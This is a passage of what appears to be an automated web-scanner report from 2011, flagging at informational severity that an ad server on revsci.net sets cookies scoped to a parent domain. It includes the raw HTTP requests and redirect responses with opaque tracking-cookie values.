Set-Cookie: rsiPus_-pah=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__g3U="MLsXsF8ubi5n4BCzUIwkp6Hql1A6rO31WVmGRQQBkAeIWvwl0z+NLXGYQV3jYHIoKow4I8MNFXoBKaA0Dmym+Ku0dkfouHaJ+u3AheYIQwDLhXakPiNxvHdXkqX5nUNUQkvVx6Eaj5O9v5Xcjbp9UvegWmGbavTTK0jhnIGcVnPgFyp+WCoXFJ/YCb6xoCFz5/OtP/XFXJ6ARSf8Il8eHtjSQ07DH7e40npqJyO7tdQkVxepqkO4h33GXxQRehGwbDMII/X964qnDBZK+hvoJgSDVTQJgbfrr9VStGZJoYAHl4yP0wCaqMqXev3nQn//YT1f5MDp3TFC5DYQRL8HsygEMgbtautJJDJrFXZfXon5bJIGfS4r2gaBvuG1hs92eLagBvBS0sDmmYhgZ3tvqzlxJ3x0XqGk1zoQfFcwPzRIYEbWjaJNG6mOleL0WvyW7crhgFR1u/9g"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhsq2soHgT7/5aCXkN7z8gcXCgZ1gJyn3KcbcbO6ijSvxycg+svdl1RHZId6XwKd3UntXGuWxHrggCzVWLD8zeu3TRxt2GlttAx89jrR0ywiAS9oiHhUC5/j6jHxtns610llu7thuUkvm0W1AigmkLPr4ijsHP8eAisFNrs3nvh2gNJgEKm9VRBMs7RFZkPTTH5fTNhQOib7i5gRZlCjF3S13zOuGsx0cAErnYgxQjb84eW9IMrhSFJX8K1sO2TOv352sChLy+VtyDpA7eEQg5s02AX67khNVaCeSV2fgaH/i346Ii+yLS7hJD0hirtdxJf16/D1kQSjC7lXzFwzmTGzbqBFVDZzp7JsamCPaFG3htjlIfpr4K4FOk3Lrnid8L4pta8NYHQj4bdnYZtioEJ5gA5gGGX+wvZUNPZic3KdpkK0aaox773kVEadgUlodt7atiGQrZcMMN3FLsdgrVZoSYgntFWl7CUudmmYmCqXyeB1Q400vGfLPoJX9/AABPUAOeTMDatdGRPCq5ZRAidE29QWzaObXh40MuR+xZj8UyCj0culXzCY5bCHGVwBY/UWDkHJlca6q4B7GgWDrZiX2GQ7PwjMN/S44ypNRcgTogtlp1X3dC5uamSkvjcQgplQCGV3fEOvztWXQ4kJVvfrFcjhbMLD6k+sPHeC6YGlfRdaysw2TQlGoLDgaaYEGDejqsvsrdMQdHShkVJ8Dta1I/H+fSD1yGpSAJtEsRo8Syvk/T73FQ9TBxej1VX1CGM7JpvGnbmquj4BTc/v2wnMAmNJnVhhOEeQVY28xWWarAWsQzaso957z6aE9g1MBWmaqopII1Wp0z0jlEIS6p0jzARWJnVyeRsgko1cglKwoVr2/bkaCz+yJgB+eWSIvCLVAQm0KxDfZB7t7gxap/lTCcXCXZAuO65WAUPoyO0NmntgxQLJXUNNzQSplhVyfXLmhWJWcNEgjib6OR9Ngl74CLPAgjcDneaa7jrBPZ7hATmF8msdJ5YacEijhk3P9JLf/Mp5G2ffHStLtiwzC1dh6g1RqMe3JnxN6Q=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:34:15 GMT

12.17. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_d8_3="MLsXsF8ubi5n4JAyM3neYUxL3byjGsaEu/PC8mfHrq2VN39C16clOd3lkQlF1r/4K9EuhyUUMr4GPKtDxyw2G0juyqPI8XbZZgxfiq6AafW/eRnGpuy0oiVFGmY3Anfh17v9nYyJlC5UWYdeqDDdjrbgLXmJ/pPo0wj0EEJCaVkNVr40iay7FTbmR5NbJCI+blpGLNeUxzogtMtHHUMNGwKx3F8aXmoPHRRqxtB/goK/IQ/uQoMDvsrutEqhZDMsyUVheav05qrblRXDPWy/rNJxLaVLM3GosHx+8zzqqJ3btw9S/QKOvEkPJO9OSD4Jsz7ZUKMr80s+7gxEkCY/pm6gU1moOoAGWrgwiuiNH0S9mp+WVqAw6ktrAucvsE6ybbgCJS2yX80idCxNbeHUzPswwQoj8F3xoVQQTNeKEEk1PD7lXR/946Xqqd2cisQ934ITg8brLQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE9DNwYYlW0E1idLvS/Qn1LhCaUFAhIyOv+V9d5XY9ZyPsA1wXIiKXHSeIHhw5Y9jFbCC8UE2QspKokupFpwJRvmC3SR9bjpy+u3zTB6wB9GtIz8ey7+WMS5mGiVeVP4eYtlG1LBl0ob101Vu7thOUknm321AigmkLMr4yjsHP8eBisFNrs1nvh2gNJgEKk9VRBMs7RFZlNr5ymNTP01l9tzQDoEJFCjH3S13zOvGsx0rLDJ86CDJ0mu4eG9IMrpSFNX8K1sO/zvYRrWNwogz6Zn68KkMi9882nuR7GooH9qwj4BstXy0Ofqiza9DRIycy7CiZ3m7NNAOZ6W3g6HPohG+1esZzkK/nwVzNWl10tgyc4p5GCPaFG3htjlIfrr4K4BPl1Lr3if8r4pRXhKzS6/xgq6+co31Z69AQ9BFwFuxuFYaskaIXIdp0KMaYqxLrrkVFadgUlpdt7atiGQvZcMMNzDLlzGMUzWSaLQ10Ycp1VHMgTjtYUOYUCu+S0GDsdFrdwfZWATEBCrghCFZRrNnL7tllYBAVppWFlFuK2hUHI6H8KHXaCPbfwT1ZZV+2SMYm5LGVXMO597msQA9q7CRqSaU0kLuSCqy+bJYKz0+NCw0npmJ+WGsgBqOas7wZSnm4lNDmUo3kw2G8q9nKxsXTWRG42E+RJmLUnBesF0e9UOnZUCfUhfFcF1JWDDCFvR8It6Stqkbwg7bW25MkGZZfr7Vurc7ydA1UVkLmTyH8RTofT7n5wOweexEsJCWh+OuXDJ3jhj0dd+BJLM7GeNzY0N8oaYbcMJJ3emWbbF5tp9Rerg2yQYt3Czfy/9/1eesgHvzkF/r4eQL083L5cHxSHN6oyEOvuiBMzEmtM+OhJCc4fFv4jjSWN2Phy1CNOotA1TJWfXOPuxt6/l99OuThD47SGXhSzBI46P5933lUtkXB99ENxHivs63dL/rf5u5kZA8LOhLtuUywXPpQu7If5LILMB8nfsJ7CR8iWTveR/9qzxgpYmB9ncLlXj93saYxct6Jodz/wWiJGUQVkTfOfOvwjDo9/0htEkF0MYVzwSx4M7cw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=1351916219573.468?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_gdpk="MLsfsN8vLi5noABTslDGHgHql1PWxLtwUwyTr7SqEAeIG7Al09+u78XGTslEJh9hd6s4OwXRvHjhIt8FcDXoBi5XqlnhuXhK+k7hhaJI9zU0CAuIx0hsbmph+ZwgGeQeavIa1wELH/jDnMrkr5ZpsnIwCKEGtcM070rhnKCJbnPgv/JP980S3TweqoaKG8kJudfxHiM2PjYCc+D3Kv4ZPeg4bJTfdrbQ7bptZJ4LtegkTcumqkO4h33GXxQRehGwbDMII/X9E+oPGwCg/xwUJgSDVTQJgbfrr9VStGZJoYAHD5K//QGfoiqTdSk5kXeo+0t3uTulN8p2Syu4yooLi8xN0kkhhQFMaSloQAt+9Q+rZ1/e100i8gaSvv7Fip5trVtjKqBYmXFoYwBh69bL8neIF3GxHL2kSRBU3s9WTic7L/IPVuew0+vAT3v8lsmTxk7equVE"; rsi_us_1000000="pUMdJE+jMAYYlW2ENjvhvtygvObDParz4dd72Y2njSIQ3FDbp4sN6ChluM8oZa8HtprfxwWjGdG1mepx3QOE/G52cE5mWm5D8+OtUcn1RBt6wB8iu4O+ygCedfKIq9/pjGepLhBB7hglaqnjXXwOdio4ZAsM8ewpawXM1Ouitf23beL8MHfsoO+keT9BYchhEqm9bRBMfxM973XWooJnIjN8J5pWnwN1IeYCPQBU6Kcx3ubkKHZeLnuEoDbICb1fVZwiijORoR9besNRbKiC5uO0GiIoH3bGO1QdVZxOERc9d/LzZ/nmdlZXlv7si2lvdgcCQI6WUUzljxKZrFRnDXuEOE8Asdd1no+bVPqW9qzvPG3Wrtf2Ybd7eGUGDovksoYO+38RpX4ztBEhTSSdexPYkwohTdS0NaK+xB69BRlRKyHuBuxIKsmabHJgkXwd9Z2grL3kdEadgUlodh7aEDuYID/6pIxK2fjGISxWSaLQ30ZAt1VAMwTjtcSOYkGu+T0G7Q9hAKyh18R9a7kSQoFt3+9406BJ0FDSG0olaPkhovf+CndgqByq4SVTZPuB/xh7yEugipIGGVwBY/U2DrlIvCKUuwL+//RwzF5htKCQhc/+lP+650tNiXCvqdUIPUtR+BNTxWslVPmzSM+ao3o3H7NjkrWKw4v8lyBbyzVBnccK6yuUPUnnPVIizAqgDS3VZ374z1uNgv2hgmHsV/eGhsi52AXVgVXWpyT8O+1HsgsqYFrmkaSmceEUxZyCN5bQUO9S3Rfc3/cuV8ZSKHzl1ItUlhObKaz0OGKnaJyQOU0rwl6K3hsfNHhFeaC0H9nXjmzh1iY4E3vDLrzwyuKlOQeBXxTNGx0gUfqSvD88i+BX9W6F/8VbBcBt6jvOGLwTBBom9JR2ZjdH+Z51SlYxp/+aJdnZJXk7MdAiuDlkxVF3iSYBYcUlVUFSLYngCDYVhGttXtm++iCdSF2R39SaIsk1YajDZ4Kjv53uHIRVCJ74ir6qNAdf9wTB8BeDDWS1VJcnrP98YZb4p0RPSkeVVUMEN3hdiYUTBqELXGUpTiXXRbbqXdw="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_d8_3="MLsXsF8ubi5n4JAyM3neYUxL3byjGsaEu/PC8mfHrq2VN39C16clOd3lkQlF1r/4K9EuhyUUMr4GPKtDxyw2G0juyqPI8XbZZgxfiq6AafW/eRnGpuy0oiVFGmY3Anfh17v9nYyJlC5UWYdeqDDdjrbgLXmJ/pPo0wj0EEJCaVkNVr40iay7FTbmR5NbJCI+blpGLNeUxzogtMtHHUMNGwKx3F8aXmoPHRRqxtB/goK/IQ/uQoMDvsrutEqhZDMsyUVheav05qrblRXDPWy/rNJxLaVLM3GosHx+8zzqqJ3btw9S/QKOvEkPJO9OSD4Jsz7ZUKMr80s+7gxEkCY/pm6gU1moOoAGWrgwiuiNH0S9mp+WVqAw6ktrAucvsE6ybbgCJS2yX80idCxNbeHUzPswwQoj8F3xoVQQTNeKEEk1PD7lXR/946Xqqd2cisQ934ITg8brLQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE9DNwYYlW0E1idLvS/Qn1LhCaUFAhIyOv+V9d5XY9ZyPsA1wXIiKXHSeIHhw5Y9jFbCC8UE2QspKokupFpwJRvmC3SR9bjpy+u3zTB6wB9GtIz8ey7+WMS5mGiVeVP4eYtlG1LBl0ob101Vu7thOUknm321AigmkLMr4yjsHP8eBisFNrs1nvh2gNJgEKk9VRBMs7RFZlNr5ymNTP01l9tzQDoEJFCjH3S13zOvGsx0rLDJ86CDJ0mu4eG9IMrpSFNX8K1sO/zvYRrWNwogz6Zn68KkMi9882nuR7GooH9qwj4BstXy0Ofqiza9DRIycy7CiZ3m7NNAOZ6W3g6HPohG+1esZzkK/nwVzNWl10tgyc4p5GCPaFG3htjlIfrr4K4BPl1Lr3if8r4pRXhKzS6/xgq6+co31Z69AQ9BFwFuxuFYaskaIXIdp0KMaYqxLrrkVFadgUlpdt7atiGQvZcMMNzDLlzGMUzWSaLQ10Ycp1VHMgTjtYUOYUCu+S0GDsdFrdwfZWATEBCrghCFZRrNnL7tllYBAVppWFlFuK2hUHI6H8KHXaCPbfwT1ZZV+2SMYm5LGVXMO597msQA9q7CRqSaU0kLuSCqy+bJYKz0+NCw0npmJ+WGsgBqOas7wZSnm4lNDmUo3kw2G8q9nKxsXTWRG42E+RJmLUnBesF0e9UOnZUCfUhfFcF1JWDDCFvR8It6Stqkbwg7bW25MkGZZfr7Vurc7ydA1UVkLmTyH8RTofT7n5wOweexEsJCWh+OuXDJ3jhj0dd+BJLM7GeNzY0N8oaYbcMJJ3emWbbF5tp9Rerg2yQYt3Czfy/9/1eesgHvzkF/r4eQL083L5cHxSHN6oyEOvuiBMzEmtM+OhJCc4fFv4jjSWN2Phy1CNOotA1TJWfXOPuxt6/l99OuThD47SGXhSzBI46P5933lUtkXB99ENxHivs63dL/rf5u5kZA8LOhLtuUywXPpQu7If5LILMB8nfsJ7CR8iWTveR/9qzxgpYmB9ncLlXj93saYxct6Jodz/wWiJGUQVkTfOfOvwjDo9/0htEkF0MYVzwSx4M7cw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:41:55 GMT

12.18. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_fS3U="MLsfsN8vLi5noABTslDGHgHql1PWxLtwUwyTr7SqEAeIG7Al09+u78XGTslEJh9hd6s4uyf0KT+RdVkyIHCdaeQj3mcEU7l6Sj3Qj5G4WmW0rSpVxafl8+M3Fk56Oh4ptMDux7SrL5cCm77WnJyEjeFA0mmzapRCOBUulwgIjQm+g66XIT5QuklEZQ0ZUK40lpWz0shPr8fLCb6nws9ZybhLffqh5oA/PO147pi1rhzplrmCnxESmw4o+EBf8zgWak40Ty27uaje21eUT8BSI6pxESrpcBetjrx+EQP5BfDN25iRTl0UGV6Rd0PW+PODtnDjF0aDwrfsnCXsDZA1lz5pIm7H8vTOz6Tp6rXuoEwC4vnK2+3GKFkTy9efnh4s3LEwNZE5D/R1bCjuA8RBSWOKNjVEPgdeYW38wM897HChogDtvYqDXI+EuvaQzYnW2WrcIuVG"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE9HCAYYlW23lB0q4DdGKH3vrseeDWozeseSI8hmVs1y9IiVsnPR7mWvcRq2i/D84TaAa8k5LT4xN0mvOzPwpJrhR300EfJhCEjmBFpjdbk3jl46vifDsQxpSkbUgiDlRIPlPFDddUf4ZwKyGVG8yyZzpc1KlNh+6xHUCydNCWk1pYw2zpCJcy0Xq1ewfSwZgkU8YbWuykXS7fiHQ+7BpC3A9cDo+dBWRC+oLlUiAuI2+OJsqbD3rTZhUcZqf/PHxR44d2yyf16w6rv74vpXGzc03lEFRcLgBiTlqVuFKRCoKYg3hqhE20rtC72XJwbqRf4nqNohc1/W2Rj1Q57pDoa7C/rhV3y1OIkDuM/wU/a2TfzoYbdbeGUGDovksoYO+38RpX4ztBEhTSSdexPYmwohTdS0NaK+7rBfx4LZDgPmZO9m5dZmY/KeiuNJOwZore0i5QDJ+nNyDPl+aqwV68N3+nUC1dgz62t3SR3cAdxXwV0b1N+lT93bHTAYHpmvjFW6LTYO62mmNdMMxE6ZVAMf9Mg3lgWgTpD0AoKv+omt9CweOZkYB167yE24hZJG9BwC0iGnWX+7mmx4f0ilrhSDM8I4HQiJ/LmTmrXGtB2rrsgZ5UyI8PrccHxeXyOrPstSXYvQmVrNJ+nbFs1NhLBfym2WY8l9reQ9vOFVNfN4m3cAlSz0tCntjgnWzbD9T60SDFDdemcbIk/SuIRFhKWOBpg5ALDdhlf0H5WuMPn5Z/o1q3UWmwYf9Xi4EIRBzO0nTds99qepYGtaJZ24V64jJuwYQbKl9ij50Pae3gOxuJ5o/Oh9Kw82gxy35sfQjIwNz7GdtRTXLBMHd+LUbvw6qVpvW5x6vmEtkevPAiSqzuJINH3EtS8s/MDgSBgnRIlq54Jbq0R1xO88si8XtUs/ZcRVgqVtGa9OYQErt0/WvyJiYgBREJX1qLhk72olVr8CMxCo7D3Iqdixu6h1I8iJoaoRrurPDye5dIkrV4oDn582sQqPOfIE9j7DzwcUnBbF5Mwp3rn8l1xx1NDoz9elQZPKNgVDhyjdQtxa1defEdJN3w=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=4650606513023.377?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_gTSf="MLsXsF8ubi5n4JDyDnheiwDql1A60Lsw0wyTHpTkGlKdGbCiOsgce2mqLNp9XQ+oVRFqht3dMO1mX1+8dfVskDjKy2cX/+Z4lnteDZm422W0rSpVxafl8+M3Fk56Oh4ptMD+h/TL16cClJvwhzx3ksiI372OclKk2rrJElMP9zSRn673IT6QntSmNJGRjB9z5zP1BvTF3BWBjl2ihgs4mkfaQEqjt9p+cBVDcmp3g8C/5o7hwOfsvpsaEL2NaEL8Yclw+0Vwxy+NhY8AmK1hLFhm3AjJYvZm7QcK/q0p6GGTtsbZ+yCazwOJc1Va5W5RVdAPXjZwCcYrug1AWdTvw+CX8pl1tT5CvgRtv4wdCIRceojk3s7+FbmOzt1dOtrGM8Ug5CT17KIktYNbeStxehxlUFVwnCxOkk7lLa1gAjSeJOnilkeIzHLo0yuoDlhn88sfkWZXU/94"; rsi_us_1000000="pUMdJE+jMAYYlW2ENjvhvlyjvObDParz4dd72Y2njSIQ3Ejbp4sN6MhluM8oZa8Httq55yHRxC8ZzYVchSGk4TkgcB56UrzjgJIXREFzLX43WBsxlgpdbj61dOiIg76BvfGJFZsjP1DddUf4Z8ICk59e3Twi7ijmYiu3pu3z9gYxZZMb9f1t4xig0cgrpStqeslISiOQIcB8zs8ypIerbzS2TPeSmKj0IlZ4k6qHdysgn6IsIrCK2Q98rebBMt9EQT7AQofgv7NV7iBmcy63NAkt+/NiUqrZvx04W5DA4ia+7TpPasFKKHfSgdztF7O67saYxqjzbUvN1k101FJXYBhcJIthuYGpmv+PlT6ji0bSPzuEhgTIXUBzWjfYfabIkr73uK0CExEj37ApcDXLd7FAMbtRknaeEB7fkKz4rxUsKv2YRcZodYwnZiTvV6eSWxFTylleEaWo/4nXX5xx1S7tTqLSjGgSabCGAJV9rzysY/Ywii41kWDVJwd4Mcmryv0Ys8mQgF099zvt4sJO4+L0DBmttBohCo/NHH4w2NW42OiNAQ4v4GPM9fmSZQAlcnPV300cuFSHvdVJfFM+aW+M8EZOSYCY4eZcFJa2Ez4slFHRhFwt7knbL+pOhl9sHKdX2WJ5S2MUZXMcRPcLyi8gikA/qwYWacyXvX/j7bL1Z8oNz+hpHu91g4NbGbvsTVn7U8Th+LYMrDLU39ALFt6VYJ1L0qkawvLEB9SU00z0AeCjdrkjdjJio2hvUMBiZekzCXSUKE1qap6PxOuHz+1uPRIe7tHF0pkC8z+3Bxl+3YNWD4Z+z5wOoyfTDeoN6VJFV4ug2qwHGSXyhMY9+w5TEGP8secVB08eHPjvIErmYAytwsIud2fgi9Z/AwXu6Yy7YJ8zhFzWS3rMcBLtpxssv/+CSnTmfVYbZS2C9w8ZQQJx5OTTknGzeKtTBlPIpNfRRbwI5PsznWuAg8gClBY5PUzOIV+9KlSFGBF8/DghOQSRr4a/7fOReWHlosdROghDC46Yc8gDO6qZfdb4Lb+40i3dd/BVkYW5lC3XK8W94VNTG14="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
